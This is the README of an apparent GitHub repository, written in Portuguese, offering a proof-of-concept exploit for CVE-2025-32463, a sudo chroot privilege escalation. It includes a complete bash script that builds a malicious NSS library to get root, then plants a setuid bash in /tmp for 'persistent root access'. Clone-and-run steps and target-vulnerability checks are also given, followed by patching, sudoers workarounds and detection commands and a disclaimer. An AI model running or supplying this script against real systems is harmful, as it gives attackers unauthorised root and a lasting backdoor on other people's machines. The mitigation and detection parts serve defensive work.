
Exploit de escalonamento local de privilégios para CVE-2025-32463, visando a falha de design do chroot do sudo. Fornece script de PoC, análise técnica e orientações de mitigação para as versões afetadas do sudo 1.9.14-1.9.17.
CVE-2025-32463 é uma vulnerabilidade crítica de escalação de privilégios local nas versões 1.9.14 a 1.9.17 do sudo. Essa vulnerabilidade permite que atacantes com privilégios de sudo escalem para acesso root ao explorar uma falha de design na lógica de processamento da opção chroot.
A vulnerabilidade ocorre devido a um problema de temporização no processo de validação de segurança do sudo. A função pivot_root é executada antes da verificação da política de segurança, permitindo que atacantes manipulem o ambiente do sistema de arquivos que o sudo utiliza para autenticação e autorização.
nsswitch.conf maliciosopivot_root: Executada cedo demais no processoset_cmnd_path: Opera no ambiente manipuladocommand_matches: Verificações de segurança contornadas devido à manipulação do ambienteAntes de usar este exploit, garanta que as seguintes condições sejam atendidas:
git clone https://github.com/KaiHT-Ladiant/CVE-2025-32463
cd CVE-2025-32463
chmod +x cve-2025-32463.sh
./cve-2025-32463.sh
Verifique se o sistema alvo é vulnerável:
# Check sudo version
sudo --version
# Check sudo privileges
sudo -l
# Look for chroot-related permissions
sudo -l | grep chroot
O script principal do exploit (cve-2025-32463.sh):
#!/bin/bash
# CVE-2025-32463 PoC - Sudo Chroot Privilege Escalation
# Based on research by Rich Mirch @ Stratascale Cyber Research Unit
STAGE=$(mktemp -d /tmp/pentest.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > pentester.c<<'CEOF'
#include <stdlib.h>
#include <unistd.h>
void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
system("id > /tmp/pwned_proof.txt");
system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
execl("/bin/bash", "/bin/bash", NULL);
}
CEOF
mkdir -p pentest/etc libnss_
echo "passwd: /pentester" > pentest/etc/nsswitch.conf
cp /etc/group pentest/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/pentester.so.2 pentester.c
echo "[*] Exploiting CVE-2025-32463..."
echo "[*] Attempting privilege escalation..."
sudo -R pentest pentest
# Cleanup
rm -rf ${STAGE?}
Após uma exploração bem-sucedida, verifique o acesso root:
# Check current privileges
whoami
# Check proof file
cat /tmp/pwned_proof.txt
# Use setuid bash for persistent root access
/tmp/rootbash -p
Atualize o sudo para a versão 1.9.17p1 ou posterior:
# Ubuntu/Debian
sudo apt update && sudo apt upgrade sudo
# CentOS/RHEL
sudo yum update sudo
# or
sudo dnf update sudo
Remova as diretivas chroot do sudoers (solução temporária):
# Backup current configuration
sudo cp /etc/sudoers /etc/sudoers.backup
# Remove chroot-related entries
sudo sed -i '/chroot/d' /etc/sudoers
# Verify syntax
sudo visudo -c
Monitore tentativas de exploração:
# Check for suspicious temporary directories
find /tmp -name "*.stage.*" -type d
# Monitor sudo logs
tail -f /var/log/auth.log | grep sudo
# Look for NSS library compilation
find /tmp -name "libnss_*.so*" -type f
A vulnerabilidade origina-se de uma falha de design no fluxo de execução do sudo:
Fluxo Normal Esperado:
Fluxo Vulnerável Real:
O exploit aproveita o sistema Name Service Switch (NSS):
/etc/nsswitch.conf para autenticação do usuárioEste exploit foi testado em:
⚠️ AVISO LEGAL IMPORTANTE ⚠️
Esta ferramenta é fornecida apenas para fins educacionais e de testes autorizados.
Contribuições são bem-vindas! Por favor:
Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.
Nota: Esta vulnerabilidade afeta um componente crítico do sistema. Utilize com responsabilidade e garanta que todos os testes sejam autorizados.